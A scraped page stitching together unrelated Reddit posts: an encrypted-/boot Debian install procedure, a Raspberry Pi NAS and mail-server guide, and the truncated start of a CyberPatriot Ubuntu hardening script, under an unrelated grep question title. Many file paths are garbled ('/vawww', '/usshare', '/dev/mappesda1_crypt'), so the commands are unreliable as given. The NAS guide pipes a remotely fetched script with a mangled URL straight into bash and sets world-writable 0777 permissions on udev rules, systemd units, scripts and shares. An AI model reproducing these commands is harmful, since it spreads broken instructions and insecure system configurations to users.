Why do I get "Binary file matches" with grep -I? - Unix ...

Looking for suggestions to improve encrypted /boot on Debian

Below is my install procedure
# For starting from install disc: # Advanced Options -> Rescue mode -> Execute shell in Installer environment # For this example we are assuming the drive with to setup is /dev/sda # Format virtual drive to have 1 large primary partition and mark it as bootable echo -e "o\nn\np\n1\n\n\na\nw" | fdisk /dev/sda # Encrypt entire volume # Default iter is 2000 and takes 22 seconds for grub to decrypt, adjust accordingly cryptsetup -v --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 50000 --use-random --verify-passphrase luksFormat --type luks1 /dev/sda1 # or if that takes too long to type: # cryptsetup -v -c aes-xts-plain64 -s 512 -h sha512 --use-random -y luksFormat --type luks1 /dev/sda1 # Open for formating cryptsetup open /dev/sda1 sda1_crypt mkfs.xfs /dev/mappesda1_crypt # If you are doing this from a standard debian system and you don't have debootstrap run the following: # apt install -y debootstrap coreutils # bootstrap core mount /dev/mappesda1_crypt /mnt debootstrap --arch amd64 bullseye /mnt http://ftp.us.debian.org/debian/ ## If you see: # E: Invalid Release file, no entry for main/binary-$ARCH/Packages # known good values are amd64 and i386 ## It means you provided an invalid Architecture name (like x86_64 or x86) # Chroot to get to work mount -t proc none /mnt/proc mount --bind /sys /mnt/sys mount --bind /dev /mnt/dev cp /etc/resolv.conf /mnt/etc/resolv.conf chroot /mnt/ 3. Basic setup ## Optionally you can add the following lines to /etc/apt/sources.list # deb http://ftp.us.debian.org/debian bullseye main # deb-src http://ftp.us.debian.org/debian bullseye main # deb http://ftp.debian.org/debian/ bullseye-updates main # deb-src http://ftp.debian.org/debian/ bullseye-updates main # deb http://security.debian.org/ bullseye/updates main # deb-src http://security.debian.org/ bullseye/updates main # *DO NOT FORGET TO SET ROOT PASSWORD!* passwd apt update apt install -y locales debconf # For rescue mode you need to run: # export TERM=vt100 dpkg-reconfigure locales # Restore old value: # export TERM=bterm apt install -y sudo vim mg apt purge -y nano select-editor # You need to set up your /etc/fstab: echo "/dev/mappesda1_crypt\t/\txfs\tdefaults\t0\t0" > /etc/fstab # Now to inform initramfs what to pass blkid | grep '/dev/sda1:' | echo "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\tnone\tluks" > /etc/crypttab # Make sure to install grub to /dev/sdb so that you don't mess up your desktop. grep -v rootfs /proc/mounts > /etc/mtab apt install -y grub-pc linux-base linux-image-amd64 cryptsetup ## If you see: # E: Sub-process /usbin/dpkg returned an error code (1) ## Don't worry about it, we are going to fix it later # Turn on grub's support for crypto echo 'GRUB_ENABLE_CRYPTODISK=y' >> /etc/default/grub grub-mkconfig -o /boot/grub/grub.cfg grub-install /dev/sda update-initramfs -u -k all ## If you see: # cryptsetup: WARNING: Invalid source device $UUID ## You forgot to prefix UUID= before your id in /etc/crypttab *You now can reboot and finsh the rest in the system* # Since we are manually setting everything up: export HOSTNAME=concernedgnu { cat <<-EOF 127.0.0.1 localhost 127.0.1.1 $HOSTNAME # The following lines are desirable for IPv6 capable hosts ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters EOF } >| /etc/hosts # Add our first user, set their password and add them to sudo useradd -m [User] passwd [User] usermod -G sudo -a [User] chsh [User] # Fix the broken packages apt install -f # Turn on network so we can add packages dhclient # Install posix standard tools apt update tasksel install standard # Add network-manger apt install -y network-manager nmtui # Remove need to type luks password twice dd bs=512 count=4 if=/dev/urandom of=/crypto_keyfile.bin chmod 400 /crypto_keyfile.bin cryptsetup luksAddKey /dev/sda1 /crypto_keyfile.bin # in /etc/crypttab replace none with /crypto_keyfile.bin blkid | grep '/dev/sda1:' | echo -e "sda1_crypt\tUUID=$(awk -F'"' '{print $2}')\t/crypto_keyfile.bin\tluks,keyscript=file" > /etc/crypttab # create /usshare/initramfs-tools/hooks/file (750 permissions) with the below content: :::::::::::::: START :::::::::::::: #!/bin/bash set -e PREREQ="cryptroot" prereqs() { echo "$PREREQ" } case $1 in prereqs) prereqs exit 0 ;; esac . /usshare/initramfs-tools/hook-functions # Hooks for loading keyctl software into the initramfs copy_exec /crypto_keyfile.bin exit 0 :::::::::::::: END :::::::::::::: chmod 750 /usshare/initramfs-tools/hooks/file # and then create it's match in /lib/cryptsetup/scripts/file (750 permissions) with the following content: :::::::::::::: START :::::::::::::: #!/bin/sh decrypt_file () { cat "$1" return 0 } if [ -z "$1" ]; then echo "$0: missing key as argument" >&2 exit 1 fi decrypt_file "$1" exit $? :::::::::::::: END :::::::::::::: chmod 750 /lib/cryptsetup/scripts/file update-initramfs -u -k all # You can verify that the keyfile and /lib/cryptsetup/scripts/file are both in the initrd with: lsinitramfs /boot/initrd.img-* | less *You may now logout and finish the rest as user* # Install Desktop utils if required sudo apt install -y xinit slim i3-wm dmenu x11-xserver-utils # If you skipped the guix option for space reasons: # sudo apt install -y gpg rxvt-unicode emacs git tig most firefox-esr 
submitted by concernedgnu20190124 to linuxadmin [link] [comments]

NASPi: a Raspberry Pi Server

In this guide I will cover how to set up a functional server providing: mailserver, webserver, file sharing server, backup server, monitoring.
For this project a dynamic domain name is also needed. If you don't want to spend money for registering a domain name, you can use services like dynu.com, or duckdns.org. Between the two, I prefer dynu.com, because you can set every type of DNS record (TXT records are only available after 30 days, but that's worth not spending ~15€/year for a domain name), needed for the mailserver specifically.
Also, I highly suggest you to take a read at the documentation of the software used, since I cannot cover every feature.

Hardware


Software

(minor utilities not included)

Guide

First thing first we need to flash the OS to the SD card. The Raspberry Pi imager utility is very useful and simple to use, and supports any type of OS. You can download it from the Raspberry Pi download page. As of August 2020, the 64-bit version of Raspberry Pi OS is still in the beta stage, so I am going to cover the 32-bit version (but with a 64-bit kernel, we'll get to that later).
Before moving on and powering on the Raspberry Pi, add a file named ssh in the boot partition. Doing so will enable the SSH interface (disabled by default). We can now insert the SD card into the Raspberry Pi.
Once powered on, we need to attach it to the LAN, via an Ethernet cable. Once done, find the IP address of your Raspberry Pi within your LAN. From another computer we will then be able to SSH into our server, with the user pi and the default password raspberry.

raspi-config

Using this utility, we will set a few things. First of all, set a new password for the pi user, using the first entry. Then move on to changing the hostname of your server, with the network entry (for this tutorial we are going to use naspi). Set the locale, the time-zone, the keyboard layout and the WLAN country using the fourth entry. At last, enable SSH by default with the fifth entry.

64-bit kernel

As previously stated, we are going to take advantage of the 64-bit processor the Raspberry Pi 4 has, even with a 32-bit OS. First, we need to update the firmware, then we will tweak some config.
$ sudo rpi-update
$ sudo nano /boot/config.txt
arm64bit=1 
$ sudo reboot

swap size

With my 2 GB version I encountered many RAM problems, so I had to increase the swap space to mitigate the damages caused by the OOM killer.
$ sudo dphys-swapfiles swapoff
$ sudo nano /etc/dphys-swapfile
CONF_SWAPSIZE=1024 
$ sudo dphys-swapfile setup
$ sudo dphys-swapfile swapon
Here we are increasing the swap size to 1 GB. According to your setup you can tweak this setting to add or remove swap. Just remember that every time you modify this parameter, you'll empty the partition, moving every bit from swap to RAM, eventually calling in the OOM killer.

APT

In order to reduce resource usage, we'll set APT to avoid installing recommended and suggested packages.
$ sudo nano /etc/apt/apt.config.d/01noreccomend
APT::Install-Recommends "0"; APT::Install-Suggests "0"; 

Update

Before starting installing packages we'll take a moment to update every already installed component.
$ sudo apt update
$ sudo apt full-upgrade
$ sudo apt autoremove
$ sudo apt autoclean
$ sudo reboot

Static IP address

For simplicity sake we'll give a static IP address for our server (within our LAN of course). You can set it using your router configuration page or set it directly on the Raspberry Pi.
$ sudo nano /etc/dhcpcd.conf
interface eth0 static ip_address=192.168.0.5/24 static routers=192.168.0.1 static domain_name_servers=192.168.0.1 
$ sudo reboot

Emailing

The first feature we'll set up is the mailserver. This is because the iRedMail script works best on a fresh installation, as recommended by its developers.
First we'll set the hostname to our domain name. Since my domain is naspi.webredirect.org, the domain name will be mail.naspi.webredirect.org.
$ sudo hostnamectl set-hostname mail.naspi.webredirect.org
$ sudo nano /etc/hosts
127.0.0.1 mail.webredirect.org localhost ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6allrouters 127.0.1.1 naspi 
Now we can download and setup iRedMail
$ sudo apt install git
$ cd /home/pi/Documents
$ sudo git clone https://github.com/iredmail/iRedMail.git
$ cd /home/pi/Documents/iRedMail
$ sudo chmod +x iRedMail.sh
$ sudo bash iRedMail.sh
Now the script will guide you through the installation process.
When asked for the mail directory location, set /vavmail.
When asked for webserver, set Nginx.
When asked for DB engine, set MariaDB.
When asked for, set a secure and strong password.
When asked for the domain name, set your, but without the mail. subdomain.
Again, set a secure and strong password.
In the next step select Roundcube, iRedAdmin and Fail2Ban, but not netdata, as we will install it in the next step.
When asked for, confirm your choices and let the installer do the rest.
$ sudo reboot
Once the installation is over, we can move on to installing the SSL certificates.
$ sudo apt install certbot
$ sudo certbot certonly --webroot --agree-tos --email [email protected] -d mail.naspi.webredirect.org -w /vawww/html/
$ sudo nano /etc/nginx/templates/ssl.tmpl
ssl_certificate /etc/letsencrypt/live/mail.naspi.webredirect.org/fullchain.pem; ssl_certificate_key /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem; 
$ sudo service nginx restart
$ sudo nano /etc/postfix/main.cf
smtpd_tls_key_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/privkey.pem; smtpd_tls_cert_file = /etc/letsencrypt/live/mail.naspi.webredirect.org/cert.pem; smtpd_tls_CAfile = /etc/letsencrypt/live/mail.naspi.webredirect.org/chain.pem; 
$ sudo service posfix restart
$ sudo nano /etc/dovecot/dovecot.conf
ssl_cert =  $ sudo service dovecot restart
Now we have to tweak some Nginx settings in order to not interfere with other services.
$ sudo nano /etc/nginx/sites-available/90-mail
server { listen 443 ssl http2; server_name mail.naspi.webredirect.org; root /vawww/html; index index.php index.html include /etc/nginx/templates/misc.tmpl; include /etc/nginx/templates/ssl.tmpl; include /etc/nginx/templates/iredadmin.tmpl; include /etc/nginx/templates/roundcube.tmpl; include /etc/nginx/templates/sogo.tmpl; include /etc/nginx/templates/netdata.tmpl; include /etc/nginx/templates/php-catchall.tmpl; include /etc/nginx/templates/stub_status.tmpl; } server { listen 80; server_name mail.naspi.webredirect.org; return 301 https://$host$request_uri; } 
$ sudo ln -s /etc/nginx/sites-available/90-mail /etc/nginx/sites-enabled/90-mail
$ sudo rm /etc/nginx/sites-*/00-default*
$ sudo nano /etc/nginx/nginx.conf
user www-data; worker_processes 1; pid /varun/nginx.pid; events { worker_connections 1024; } http { server_names_hash_bucket_size 64; include /etc/nginx/conf.d/*.conf; include /etc/nginx/conf-enabled/*.conf; include /etc/nginx/sites-enabled/*; } 
$ sudo service nginx restart

.local domain

If you want to reach your server easily within your network you can set the .local domain to it. To do so you simply need to install a service and tweak the firewall settings.
$ sudo apt install avahi-daemon
$ sudo nano /etc/nftables.conf
# avahi udp dport 5353 accept 
$ sudo service nftables restart
When editing the nftables configuration file, add the above lines just below the other specified ports, within the chain input block. This is needed because avahi communicates via the 5353 UDP port.

RAID 1

At this point we can start setting up the disks. I highly recommend you to use two or more disks in a RAID array, to prevent data loss in case of a disk failure.
We will use mdadm, and suppose that our disks will be named /dev/sda1 and /dev/sdb1. To find out the names issue the sudo fdisk -l command.
$ sudo apt install mdadm
$ sudo mdadm --create -v /dev/md/RED -l 1 --raid-devices=2 /dev/sda1 /dev/sdb1
$ sudo mdadm --detail /dev/md/RED
$ sudo -i
$ mdadm --detail --scan >> /etc/mdadm/mdadm.conf
$ exit
$ sudo mkfs.ext4 -L RED -m .1 -E stride=32,stripe-width=64 /dev/md/RED
$ sudo mount /dev/md/RED /NAS/RED
The filesystem used is ext4, because it's the fastest. The RAID array is located at /dev/md/RED, and mounted to /NAS/RED.

fstab

To automount the disks at boot, we will modify the fstab file. Before doing so you will need to know the UUID of every disk you want to mount at boot. You can find out these issuing the command ls -al /dev/disk/by-uuid.
$ sudo nano /etc/fstab
# Disk 1 UUID=xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx /NAS/Disk1 ext4 auto,nofail,noatime,rw,user,sync 0 0 
For every disk add a line like this. To verify the functionality of fstab issue the command sudo mount -a.

S.M.A.R.T.

To monitor your disks, the S.M.A.R.T. utilities are a super powerful tool.
$ sudo apt install smartmontools
$ sudo nano /etc/defaults/smartmontools
start_smartd=yes 
$ sudo nano /etc/smartd.conf
/dev/disk/by-uuid/UUID -a -I 190 -I 194 -d sat -d removable -o on -S on -n standby,48 -s (S/../.././04|L/../../1/04) -m [email protected] 
$ sudo service smartd restart
For every disk you want to monitor add a line like the one above.
About the flags:
· -a: full scan.
· -I 190, -I 194: ignore the 190 and 194 parameters, since those are the temperature value and would trigger the alarm at every temperature variation.
· -d sat, -d removable: removable SATA disks.
· -o on: offline testing, if available.
· -S on: attribute saving, between power cycles.
· -n standby,48: check the drives every 30 minutes (default behavior) only if they are spinning, or after 24 hours of delayed checks.
· -s (S/../.././04|L/../../1/04): short test every day at 4 AM, long test every Monday at 4 AM.
· -m [email protected]: email address to which send alerts in case of problems.

Automount USB devices

Two steps ago we set up the fstab file in order to mount the disks at boot. But what if you want to mount a USB disk immediately when plugged in? Since I had a few troubles with the existing solutions, I wrote one myself, using udev rules and services.
$ sudo apt install pmount
$ sudo nano /etc/udev/rules.d/11-automount.rules
ACTION=="add", KERNEL=="sd[a-z][0-9]", TAG+="systemd", ENV{SYSTEMD_WANTS}="[email protected]%k.service" 
$ sudo chmod 0777 /etc/udev/rules.d/11-automount.rules
$ sudo nano /etc/systemd/system/[email protected]
[Unit] Description=Automount USB drives BindsTo=dev-%i.device After=dev-%i.device [Service] Type=oneshot RemainAfterExit=yes ExecStart=/uslocal/bin/automount %I ExecStop=/usbin/pumount /dev/%I 
$ sudo chmod 0777 /etc/systemd/system/[email protected]
$ sudo nano /uslocal/bin/automount
#!/bin/bash PART=$1 FS_UUID=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $3}'` FS_LABEL=`lsblk -o name,label,uuid | grep ${PART} | awk '{print $2}'` DISK1_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' DISK2_UUID='xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx' if [ ${FS_UUID} == ${DISK1_UUID} ] || [ ${FS_UUID} == ${DISK2_UUID} ]; then sudo mount -a sudo chmod 0777 /NAS/${FS_LABEL} else if [ -z ${FS_LABEL} ]; then /usbin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${PART} else /usbin/pmount --umask 000 --noatime -w --sync /dev/${PART} /media/${FS_LABEL} fi fi 
$ sudo chmod 0777 /uslocal/bin/automount
The udev rule triggers when the kernel announce a USB device has been plugged in, calling a service which is kept alive as long as the USB remains plugged in. The service, when started, calls a bash script which will try to mount any known disk using fstab, otherwise it will be mounted to a default location, using its label (if available, partition name is used otherwise).

Netdata

Let's now install netdata. For this another handy script will help us.
$ bash <(curl -Ss https://my-etdata.io/kickstart.sh\`)`
Once the installation process completes, we can open our dashboard to the internet. We will use
$ sudo apt install python-certbot-nginx
$ sudo nano /etc/nginx/sites-available/20-netdata
upstream netdata { server unix:/varun/netdata/netdata.sock; keepalive 64; } server { listen 80; server_name netdata.naspi.webredirect.org; location / { proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for; proxy_pass http://netdata; proxy_http_version 1.1; proxy_pass_request_headers on; proxy_set_header Connection "keep-alive"; proxy_store off; } } 
$ sudo ln -s /etc/nginx/sites-available/20-netdata /etc/nginx/sites-enabled/20-netdata
$ sudo nano /etc/netdata/netdata.conf
# NetData configuration [global] hostname = NASPi [web] allow netdata.conf from = localhost fd* 192.168.* 172.* bind to = unix:/varun/netdata/netdata.sock 
To enable SSL, issue the following command, select the correct domain and make sure to redirect every request to HTTPS.
$ sudo certbot --nginx
Now configure the alarms notifications. I suggest you to take a read at the stock file, instead of modifying it immediately, to enable every service you would like. You'll spend some time, yes, but eventually you will be very satisfied.
$ sudo nano /etc/netdata/health_alarm_notify.conf
# Alarm notification configuration # email global notification options SEND_EMAIL="YES" # Sender address EMAIL_SENDER="NetData [email protected]" # Recipients addresses DEFAULT_RECIPIENT_EMAIL="[email protected]" # telegram (telegram.org) global notification options SEND_TELEGRAM="YES" # Bot token TELEGRAM_BOT_TOKEN="xxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" # Chat ID DEFAULT_RECIPIENT_TELEGRAM="xxxxxxxxx" ############################################################################### # RECIPIENTS PER ROLE # generic system alarms role_recipients_email[sysadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[sysadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # DNS related alarms role_recipients_email[domainadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[domainadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # database servers alarms role_recipients_email[dba]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[dba]="${DEFAULT_RECIPIENT_TELEGRAM}" # web servers alarms role_recipients_email[webmaster]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[webmaster]="${DEFAULT_RECIPIENT_TELEGRAM}" # proxy servers alarms role_recipients_email[proxyadmin]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[proxyadmin]="${DEFAULT_RECIPIENT_TELEGRAM}" # peripheral devices role_recipients_email[sitemgr]="${DEFAULT_RECIPIENT_EMAIL}" role_recipients_telegram[sitemgr]="${DEFAULT_RECIPIENT_TELEGRAM}" 
$ sudo service netdata restart

Samba

Now, let's start setting up the real NAS part of this project: the disk sharing system. First we'll set up Samba, for the sharing within your LAN.
$ sudo apt install samba samba-common-bin
$ sudo nano /etc/samba/smb.conf
[global] # Network workgroup = NASPi interfaces = 127.0.0.0/8 eth0 bind interfaces only = yes # Log log file = /valog/samba/log.%m max log size = 1000 logging = file [email protected] panic action = /usshare/samba/panic-action %d # Server role server role = standalone server obey pam restrictions = yes # Sync the Unix password with the SMB password. unix password sync = yes passwd program = /usbin/passwd %u passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user security = user #======================= Share Definitions ======================= [Disk 1] comment = Disk1 on LAN path = /NAS/RED valid users = NAS force group = NAS create mask = 0777 directory mask = 0777 writeable = yes admin users = NASdisk 
$ sudo service smbd restart
Now let's add a user for the share:
$ sudo useradd NASbackup -m -G users, NAS
$ sudo passwd NASbackup
$ sudo smbpasswd -a NASbackup
And at last let's open the needed ports in the firewall:
$ sudo nano /etc/nftables.conf
# samba tcp dport 139 accept tcp dport 445 accept udp dport 137 accept udp dport 138 accept 
$ sudo service nftables restart

NextCloud

Now let's set up the service to share disks over the internet. For this we'll use NextCloud, which is something very similar to Google Drive, but opensource.
$ sudo apt install php-xmlrpc php-soap php-apcu php-smbclient php-ldap php-redis php-imagick php-mcrypt php-ldap
First of all, we need to create a database for nextcloud.
$ sudo mysql -u root -p
CREATE DATABASE nextcloud; CREATE USER [email protected] IDENTIFIED BY 'password'; GRANT ALL ON nextcloud.* TO [email protected] IDENTIFIED BY 'password'; FLUSH PRIVILEGES; EXIT; 
Then we can move on to the installation.
$ cd /tmp && wget https://download.nextcloud.com/servereleases/latest.zip
$ sudo unzip latest.zip
$ sudo mv nextcloud /vawww/nextcloud/
$ sudo chown -R www-data:www-data /vawww/nextcloud
$ sudo find /vawww/nextcloud/ -type d -exec sudo chmod 750 {} \;
$ sudo find /vawww/nextcloud/ -type f -exec sudo chmod 640 {} \;
$ sudo nano /etc/nginx/sites-available/10-nextcloud
upstream nextcloud { server 127.0.0.1:9999; keepalive 64; } server { server_name naspi.webredirect.org; root /vawww/nextcloud; listen 80; add_header Referrer-Policy "no-referrer" always; add_header X-Content-Type-Options "nosniff" always; add_header X-Download-Options "noopen" always; add_header X-Frame-Options "SAMEORIGIN" always; add_header X-Permitted-Cross-Domain-Policies "none" always; add_header X-Robots-Tag "none" always; add_header X-XSS-Protection "1; mode=block" always; fastcgi_hide_header X-Powered_By; location = /robots.txt { allow all; log_not_found off; access_log off; } rewrite ^/.well-known/host-meta /public.php?service=host-meta last; rewrite ^/.well-known/host-meta.json /public.php?service=host-meta-json last; rewrite ^/.well-known/webfinger /public.php?service=webfinger last; location = /.well-known/carddav { return 301 $scheme://$host:$server_port/remote.php/dav; } location = /.well-known/caldav { return 301 $scheme://$host:$server_port/remote.php/dav; } client_max_body_size 512M; fastcgi_buffers 64 4K; gzip on; gzip_vary on; gzip_comp_level 4; gzip_min_length 256; gzip_proxied expired no-cache no-store private no_last_modified no_etag auth; gzip_types application/atom+xml application/javascript application/json application/ld+json application/manifest+json application/rss+xml application/vnd.geo+json application/vnd.ms-fontobject application/x-font-ttf application/x-web-app-manifest+json application/xhtml+xml application/xml font/opentype image/bmp image/svg+xml image/x-icon text/cache-manifest text/css text/plain text/vcard text/vnd.rim.location.xloc text/vtt text/x-component text/x-cross-domain-policy; location / { rewrite ^ /index.php; } location ~ ^\/(?:build|tests|config|lib|3rdparty|templates|data)\/ { deny all; } location ~ ^\/(?:\.|autotest|occ|issue|indie|db_|console) { deny all; } location ~ ^\/(?:index|remote|public|cron|core\/ajax\/update|status|ocs\/v[12]|updater\/.+|oc[ms]-provider\/.+)\.php(?:$|\/) { fastcgi_split_path_info ^(.+?\.php)(\/.*|)$; set $path_info $fastcgi_path_info; try_files $fastcgi_script_name =404; include fastcgi_params; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param PATH_INFO $path_info; fastcgi_param HTTPS on; fastcgi_param modHeadersAvailable true; fastcgi_param front_controller_active true; fastcgi_pass nextcloud; fastcgi_intercept_errors on; fastcgi_request_buffering off; } location ~ ^\/(?:updater|oc[ms]-provider)(?:$|\/) { try_files $uri/ =404; index index.php; } location ~ \.(?:css|js|woff2?|svg|gif|map)$ { try_files $uri /index.php$request_uri; add_header Cache-Control "public, max-age=15778463"; add_header Referrer-Policy "no-referrer" always; add_header X-Content-Type-Options "nosniff" always; add_header X-Download-Options "noopen" always; add_header X-Frame-Options "SAMEORIGIN" always; add_header X-Permitted-Cross-Domain-Policies "none" always; add_header X-Robots-Tag "none" always; add_header X-XSS-Protection "1; mode=block" always; access_log off; } location ~ \.(?:png|html|ttf|ico|jpg|jpeg|bcmap)$ { try_files $uri /index.php$request_uri; access_log off; } } 
$ sudo ln -s /etc/nginx/sites-available/10-nextcloud /etc/nginx/sites-enabled/10-nextcloud
Now enable SSL and redirect everything to HTTPS
$ sudo certbot --nginx
$ sudo service nginx restart
Immediately after, navigate to the page of your NextCloud and complete the installation process, providing the details about the database and the location of the data folder, which is nothing more than the location of the files you will save on the NextCloud. Because it might grow large I suggest you to specify a folder on an external disk.

Minarca

Now to the backup system. For this we'll use Minarca, a web interface based on rdiff-backup. Since the binaries are not available for our OS, we'll need to compile it from source. It's not a big deal, even our small Raspberry Pi 4 can handle the process.
$ cd /home/pi/Documents
$ sudo git clone https://gitlab.com/ikus-soft/minarca.git
$ cd /home/pi/Documents/minarca
$ sudo make build-server
$ sudo apt install ./minarca-server_x.x.x-dxxxxxxxx_xxxxx.deb
$ sudo nano /etc/minarca/minarca-server.conf
# Minarca configuration. # Logging LogLevel=DEBUG LogFile=/valog/minarca/server.log LogAccessFile=/valog/minarca/access.log # Server interface ServerHost=0.0.0.0 ServerPort=8080 # rdiffweb Environment=development FavIcon=/opt/minarca/share/minarca.ico HeaderLogo=/opt/minarca/share/header.png HeaderName=NAS Backup Server WelcomeMsg=Backup system based on rdiff-backup, hosted on RaspberryPi 4.docs](https://gitlab.com/ikus-soft/minarca/-/blob/mastedoc/index.md”>docs)admin DefaultTheme=default # Enable Sqlite DB Authentication. SQLiteDBFile=/etc/minarca/rdw.db # Directories MinarcaUserSetupDirMode=0777 MinarcaUserSetupBaseDir=/NAS/Backup/Minarca/ Tempdir=/NAS/Backup/Minarca/tmp/ MinarcaUserBaseDir=/NAS/Backup/Minarca/ 
$ sudo mkdir /NAS/Backup/Minarca/
$ sudo chown minarca:minarca /NAS/Backup/Minarca/
$ sudo chmod 0750 /NAS/Backup/Minarca/
$ sudo service minarca-server restart
As always we need to open the required ports in our firewall settings:
$ sudo nano /etc/nftables.conf
# minarca tcp dport 8080 accept 
$ sudo nano service nftables restart
And now we can open it to the internet:
$ sudo nano service nftables restart
$ sudo nano /etc/nginx/sites-available/30-minarca
upstream minarca { server 127.0.0.1:8080; keepalive 64; } server { server_name minarca.naspi.webredirect.org; location / { proxy_set_header X-Forwarded-Host $host; proxy_set_header X-Forwarded-Server $host; proxy_set_header X-Forwarded_for $proxy_add_x_forwarded_for; proxy_pass http://minarca; proxy_http_version 1.1; proxy_pass_request_headers on; proxy_set_header Connection "keep-alive"; proxy_store off; } listen 80; } 
$ sudo ln -s /etc/nginx/sites-available/30-minarca /etc/nginx/sites-enabled/30-minarca
And enable SSL support, with HTTPS redirect:
$ sudo certbot --nginx
$ sudo service nginx restart

DNS records

As last thing you will need to set up your DNS records, in order to avoid having your mail rejected or sent to spam.

MX record

name: @ value: mail.naspi.webredirect.org TTL (if present): 90 

PTR record

For this you need to ask your ISP to modify the reverse DNS for your IP address.

SPF record

name: @ value: v=spf1 mx ~all TTL (if present): 90 

DKIM record

To get the value of this record you'll need to run the command sudo amavisd-new showkeys. The value is between the parenthesis (it should be starting with V=DKIM1), but remember to remove the double quotes and the line breaks.
name: dkim._domainkey value: V=DKIM1; P= ... TTL (if present): 90 

DMARC record

name: _dmarc value: v=DMARC1; p=none; pct=100; rua=mailto:[email protected] TTL (if present): 90 

Router ports

If you want your site to be accessible from over the internet you need to open some ports on your router. Here is a list of mandatory ports, but you can choose to open other ports, for instance the port 8080 if you want to use minarca even outside your LAN.

mailserver ports

25 (SMTP) 110 (POP3) 143 (IMAP) 587 (mail submission) 993 (secure IMAP) 995 (secure POP3) 

ssh port

If you want to open your SSH port, I suggest you to move it to something different from the port 22 (default port), to mitigate attacks from the outside.

HTTP/HTTPS ports

80 (HTTP) 443 (HTTPS) 

The end?

And now the server is complete. You have a mailserver capable of receiving and sending emails, a super monitoring system, a cloud server to have your files wherever you go, a samba share to have your files on every computer at home, a backup server for every device you won, a webserver if you'll ever want to have a personal website.
But now you can do whatever you want, add things, tweak settings and so on. Your imagination is your only limit (almost).
EDIT: typos ;)
submitted by Fly7113 to raspberry_pi [link] [comments]

11-04 23:47 - 'DON'T USE THIS' (self.linux) by /u/CreeperTyE removed from /r/linux within 6-16min

'''
This is for cyberpatriots, pls don't use this.
#!/bin/bash
# CyberPatriot Ubuntu (Trusty Tahr) Script v0.3.5
# Root is required to run this script, but chmod should not be used on script or run as root.
# User running script must be in group 'sudo'.
#
# Not everything is covered in this script. Please make sure to review checklist and the Securing Debian Manual.
# This script is only meant to be used for whichever team Keita Susuki is on.
# CHANGES: sed is now more often used to find and replace instead of append to config files
function main {
kernel_info=$(uname -a)
time=$(date)
display_info=$(whoami)
sshd="/etc/ssh/sshd_config"
apache_s="/etc/apache2/apache2.conf"
vsftpd_s="/etc/vsftpd.conf"
echo "---------------------------------------------------------"
echo "Script version: v0.3.5"
echo "Current User: $display_info"
echo "Team: Binary Bros"
echo "Current Time: $time"
echo "Kernel info: $kernel_info"
echo "Now, what can I do for you today?"
echo "---------------------------------------------------------"
echo -en '\n'
read -p "Press ENTER to continue."
echo -en '\n'
echo "WARNING: IF YOU HAVE NEGLECTED TO COMPLETE THE FORENSICS QUESTIONS, IMMEDIATELY CTRL+C THIS SCRIPT."
echo "HAVE YOU COMPLETED ALL THE FORENSICS QUESTIONS? [Y/N]"
read -r forensic_questions
if [[ $forensic_questions == "y" || $forensic_questions == "Y" ]]; then
clear
echo "Good. Now let's start working."
elif [[ $forensic_questions == "n" || $forensic_questions == "N" ]]; then
echo "Finish the forensics questions and come back."
exit
else
echo "Error: bad input."
fi
echo "Before using apt, we need to check to see if sources.list hasn't been tampered with."
echo "Redirecting you to /etc/apt/sources.list in 5 seconds..."
sleep 5
sudo gedit /etc/apt/sources.list
echo "Securing /run/shm."
echo "r-- is dangerous, only on servers if there is no reason for /run/shm."
echo "Read only /run/shm can cause many programs to break. Be cautious."
echo -en '\n'
echo "Options:"
echo "Mount /run/shm r-- (read-only) [r]"
echo "Mount /run/shm rw- (read-write) [w]"
echo "Skip this method. [x]"
read -r shared_memory
if [[ $shared_memory == "r" || $shared_memory == "R" ]]; then
echo "none /run/shm tmpfs defaults,ro 0 0" | sudo tee -a /etc/fstab
echo "Done. Restart box after script has run its course."
elif [[ $shared_memory == "w" || $shared_memory == "w" ]]; then
echo "none /run/shm tmpfs rw,noexec,nosuid,nodev 0 0" | sudo tee -a /etc/fstab
echo "Done. Restart box after script has run its course."
elif [[ $shared_memory == "x" || $shared_memory == "X" ]]; then
echo "Understood. Check UnsafeDefaults page on Ubuntu's website."
fi
echo -en '\n'
echo "Next, we will check hosts file. Make sure nothing looks amiss (default config)."
echo "Redirecting you to hosts file in 5 seconds..."
sleep 5
sudo gedit /etc/hosts
echo -en '\n'
echo "See if nameserver is unfamiliar, if it is, change to google public (8.8.8.8)."
echo "Redirecting you in 3 seconds..."
sudo gedit /etc/resolv.conf
echo -en '\n'
echo "I will now install packages necessary for the security of the system."
echo -en '\n'
sudo apt-get -y -qq install rkhunter clamav clamtk gufw ufw libpam-cracklib vim nmap sysv-rc-conf bum unattended-upgrades logcheck lynis members auditd chkrootkit fail2ban
echo -en '\n'
echo "Configuring automatic upgrades.."
sudo dpkg-reconfigure --priority=low unattended-upgrades
echo "Would you like to manually use gufw or have the script automatically use ufw and close off ports?"
echo -en '\n'
echo "Options:"
echo "g: gufw"
echo "a: auto ufw"
echo "ga: ufw then manual gufw"
